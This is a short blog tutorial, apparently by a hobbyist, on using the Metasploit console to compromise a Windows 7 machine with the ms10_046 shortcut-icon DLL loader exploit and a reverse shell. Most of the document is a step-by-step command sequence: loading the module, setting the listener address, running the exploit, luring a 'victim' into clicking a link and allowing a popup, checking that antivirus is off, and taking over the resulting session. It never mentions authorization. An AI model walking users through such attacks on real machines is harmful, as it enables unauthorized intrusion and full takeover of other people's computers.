Metasploit Basics : Reverse Shell Win7

Metasploit. Anyone who has done even most cursory investigation into the field of penetration testing or hacking has inevitably heard of it. First released in 2003, Metasploit is THE exploit framework. At the time of this publication Metasploit boasts over 1500 exploits with nearly 500 different payloads. All of which can be used with ease a number of different ways. Today I am going to go over some of the basics of the most popular feature, the Metasploit Console.

I am going to skip the stuff about downloading and whatnot and just assume you are using Kali Linux. It comes pre loaded on all the latest versions of Kali. All you need to do is open up a terminal window and type the command.

~ > service postgresql start

this starts up the postgres SQL database that metasploit links to for saving any data you want to capture after exploit. Another trick I have learned with the newer release of Kali, is to actually click on the Metasploit icon in located in the favorites menu. This seem to run some initial setup if this is the first time firing up the application.

Ok now that we have the DB running lets fire up the command-line console.

~ > msfconsole

Metasploit console It should look like this

Now that we have msfconsole up and running there are a ton of different commands. A couple useful ones to know in the beginning are things like help followed by the thing you are looking for help with. In the example below I should what the out put of help route looks like.

Metasploit works as a framework that is constantly collecting different exploits from the open source info sec community. There are several different ways to go about searching for the modules associated with these exploits. First is the Module Database located at https://www.rapid7.com/db/modules/. Here you will find a nice user interface that is pretty self explanatory. Below is a photo of what the site looks like.

Rapid7 Module Database

The way I prefer to go about searching for modules is right here in the console command line. Utilizing the built in search functionally is almost always the most efficient way to go. It does require you know roughly what you are looking for, say for example ms10_046. If you are unfamiliar with this I would suggest googling it but the TL/DR is that this is the format for Microsoft security bulletins. This particular one exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.

if we run the command

#msf > search ms10_046

we get something like this (Below)

Metasploit Search

Once you have located the module enter the

#msf > info exploit/windows/browser/ms10_046_shortcut_icon_dllloader

Now we see a treasure trove of important information associated with the module. The name, module name, platform, whether or not it is privileged, its rank, available targets, basic options, payload information, a brief description as well as references to online database entries corresponding to the module.

Metasploit Info

Once we have determined that this is indeed the module we are looking for you simply use the command

#msf > use windows/browser/ms10_046_shortcut_icon_dllloader

(you can now drop the exploit from the beginning of the name, Metasploit figures as much

Now that we have to module loaded up we still need to give it some more information. Remember the fields like SRVHOST and LHOST and such when we typed out info? We need to tell Metasploit where to aim the cannon! Most all modules are going to need some configuration so make sure you do a bit of research as to exactly how the exploit is suppose to work but also know that Metasploit will do a lot of assuming for you if you decide to be lazy.

For our example we are simply going to want to set the SRVHOST and LHOST to your HOST IP address running Metasploit. If you aren't sure you can run ifconfig anytime in Metasploit and Kali will spit out the info. The way we set these things is easy. Simply enter the following...

#msf > set SRVHOST <YOUR IP ADDRESS>

#msf > set LHOST <YOUR IP ADDRESS>

Now lets do a quick check to make sure everything is set correctly

#msf > show options

You should now see that both SRVHOST and LHOST are set to the IP address you entered. We are now good to go!

This is my favorite part...Run the command...

#msf > exploit

ahhhhh gives me goosebumps! Anyways once you run this command the magic of Meatsploit truly starts. You just sit back and watch it do its thing!

Exploit

This particular exploit will give you a an address which is simply your IP address to send to the target to click on. Once they do a popup window will appear asking for permission, once they click ALLOW you're in! NOTE: Make sure they do not have any AntiVirus running on the target PC.

You can check the number of successful connected sessions by running the command sessions in msf console. Once you see the connected victim its time to login to the system. run the command

#msf > session -i 1

Once connected type linux command to browse inside the System and have full control on it

This should hopefully show you the amazing power Metasploit gives you. I hope you have enjoyed and as always feel free to leave feedback and remember...Everything can be hacked!

_Jason